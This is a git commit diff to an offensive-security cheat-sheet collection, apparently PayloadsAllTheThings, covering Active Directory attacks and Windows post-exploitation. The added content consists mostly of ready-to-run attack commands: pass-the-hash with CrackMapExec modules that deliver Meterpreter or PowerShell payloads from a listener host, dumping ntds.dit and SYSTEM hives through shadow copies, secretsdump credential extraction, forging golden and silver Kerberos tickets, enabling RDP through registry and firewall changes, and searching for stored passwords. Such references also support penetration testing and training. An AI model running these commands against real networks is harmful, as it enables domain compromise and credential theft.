PassTheTicket + OpenShare + Tools(CME example)
parent
4cf28496e0
commit
cdc3adee51
|
@ -4,10 +4,12 @@
|
|||
* [Tools](#tools)
|
||||
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||
* [Open Shares](#open-shares)
|
||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
* [Golden Tickets](#golden-tickets)
|
||||
* [Silver Tickets](#silver-tickets)
|
||||
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||
* [Golden Tickets](#passtheticket-golden-tickets)
|
||||
* [Silver Tickets](#passtheticket-silver-tickets)
|
||||
* [Trust Tickets](#trust-tickets)
|
||||
* [Kerberoast](#kerberoast)
|
||||
* [Pass-the-Hash](#pass-the-hash)
|
||||
|
@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
|||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||
```
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
```powershell
|
||||
|
@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
|
|||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
```
|
||||
|
||||
## Open Shares
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
ls # list files
|
||||
cd
|
||||
get # download files
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
Mount a share
|
||||
```powershell
|
||||
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||
```
|
||||
|
||||
|
||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
@ -106,6 +123,21 @@ vssadmin create shadow /for=C :
|
|||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||
```
|
||||
|
||||
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
```powershell
|
||||
Import-Module .\Copy-VSS.ps1
|
||||
Copy-VSS
|
||||
Copy-VSS -DestinationDir C:\ShadowCopy\
|
||||
```
|
||||
|
||||
**Using vssadmin**
|
||||
```powershell
|
||||
vssadmin create shadow /for=C:
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||
```
|
||||
|
||||
|
||||
**Using DiskShadow (a Windows signed binary)**
|
||||
```powershell
|
||||
diskshadow.txt contains :
|
||||
|
@ -118,6 +150,7 @@ delete shadows volume %someAlias%
|
|||
reset
|
||||
|
||||
then:
|
||||
NOTE - must be executed from C:\Windows\System32
|
||||
diskshadow.exe /s c:\diskshadow.txt
|
||||
dir c:\exfil
|
||||
reg.exe save hklm\system c:\exfil\system.bak
|
||||
|
@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak
|
|||
**Extract hashes from ntds.dit**
|
||||
then you need to use secretsdump to extract the hashes
|
||||
```c
|
||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||
```
|
||||
secretsdump also works remotely
|
||||
```c
|
||||
./secretsdump.py IP administrator@domain -use-vss
|
||||
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
|
||||
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
|
||||
```
|
||||
|
||||
|
||||
|
@ -150,7 +184,7 @@ CrackMapExec module
|
|||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||
```
|
||||
|
||||
## Password in AD User comment
|
||||
### Password in AD User comment
|
||||
```powershell
|
||||
enum4linux | grep -i desc
|
||||
There are 3-4 fields that seem to be common in most AD schemas:
|
||||
|
@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
|||
```
|
||||
|
||||
|
||||
### Golden Tickets
|
||||
### PassTheTicket Golden Tickets
|
||||
Forge a TGT, require krbtgt key
|
||||
|
||||
Mimikatz version
|
||||
|
@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
|||
kerberos_ticket_list
|
||||
```
|
||||
|
||||
### Silver Tickets
|
||||
Forge a TGS, require machine accound password (key) from the KDC
|
||||
Using a ticket on Linux
|
||||
```powershell
|
||||
Convert the ticket kirbi to ccache with kekeo
|
||||
misc::convert ccache ticket.kirbi
|
||||
|
||||
Alternatively you can use ticketer from Impacket
|
||||
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
|
||||
|
||||
export KRB5CCNAME=/home/user/ticket.ccache
|
||||
cat $KRB5CCNAME
|
||||
|
||||
|
||||
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
|
||||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
### PassTheTicket Silver Tickets
|
||||
Forging a TGS require machine accound password (key) from the KDC
|
||||
```powershell
|
||||
Create a ticket for the service
|
||||
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
||||
|
||||
Then use the same steps as a Golden ticket
|
||||
misc::convert ccache ticket.kirbi
|
||||
export KRB5CCNAME=/home/user/ticket.ccache
|
||||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
### Trust Tickets
|
||||
|
||||
TODO
|
||||
|
||||
### Kerberoast
|
||||
```c
|
||||
|
@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
|||
|
||||
|
||||
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||
```
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
|
@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain
|
|||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
|
|
@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
|||
|
||||
## Thanks to
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
|
@ -92,28 +92,29 @@ net share
|
|||
|
||||
## Looting for passwords
|
||||
|
||||
Search for file contents
|
||||
### Search for file contents**
|
||||
```powershell
|
||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
Search for a file with a certain filename
|
||||
### Search for a file with a certain filename
|
||||
```powershell
|
||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||
```
|
||||
|
||||
Search the registry for key names
|
||||
### Search the registry for key names
|
||||
```powershell
|
||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||
```
|
||||
|
||||
Read a value of a certain sub key
|
||||
### Read a value of a certain sub key
|
||||
```powershell
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
Password in unattend.xml
|
||||
### Password in unattend.xml
|
||||
Location of the unattend.xml files
|
||||
```powershell
|
||||
C:\unattend.xml
|
||||
C:\Windows\Panther\Unattend.xml
|
||||
|
@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml
|
|||
C:\Windows\system32\sysprep.inf
|
||||
C:\Windows\system32\sysprep\sysprep.xml
|
||||
```
|
||||
|
||||
Example content
|
||||
```powershell
|
||||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||||
<AutoLogon>
|
||||
|
@ -182,4 +185,6 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
|
|||
## Thanks to
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
|
@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
|||
```
|
||||
|
||||
## RDP Remote Desktop Protocol (Impacket)
|
||||
```
|
||||
```powershell
|
||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
```
|
||||
```powershell
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
netsh firewall set service remoteadmin enable
|
||||
netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
```
|
||||
```powershell
|
||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
|
@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+
|
|||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||
```
|
||||
|
||||
with Metasploit
|
||||
```powershell
|
||||
run getgui -u admin -p 1234
|
||||
```
|
||||
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Payloads All The Things
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||
I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||
|
||||
Every section contains:
|
||||
- README.md - vulnerability description and how to exploit it
|
||||
|
|
Loading…
Reference in New Issue